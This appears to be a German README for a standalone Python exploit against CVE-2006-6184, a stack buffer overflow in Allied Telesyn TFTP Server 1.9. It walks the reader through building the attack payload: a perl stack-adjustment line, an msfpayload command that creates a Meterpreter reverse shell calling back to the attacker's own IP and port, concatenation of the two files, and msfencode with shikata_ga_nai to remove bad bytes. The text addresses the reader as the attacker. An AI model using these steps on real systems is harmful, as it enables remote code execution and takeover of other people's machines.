
vereinfachte Version von https://github.com/shauntdergrigorian/cve-2006-6184
Dies ist ein eigenständiger, in Python geschriebener Exploit für CVE-2006-6184. Dieser Exploit löst einen Stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen.
Du hast doch nicht gedacht, dass es so einfach wäre, oder? Das Payload muss angepasst werden, um deine eigene IP-Adresse und deinen Listening-Port zu enthalten, du musst es also selbst generieren. Gehe dazu folgendermaßen vor:
1.) Gib Folgendes ein, um eine Hex-Datei des Betrags zu erstellen, der vom Stack-Pointer subtrahiert werden muss (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Verwende als Nächstes den folgenden Befehl, um ein mehrstufiges Meterpreter-Shell-Payload zu erstellen:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Kombiniere dann die beiden gerade erstellten Dateien.
cat stackadj payload > shellcode
4.) Zum Schluss eliminieren wir die unerwünschten Zeichen.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Gib die Ausgabe als Wert der Variablen "payload" ein.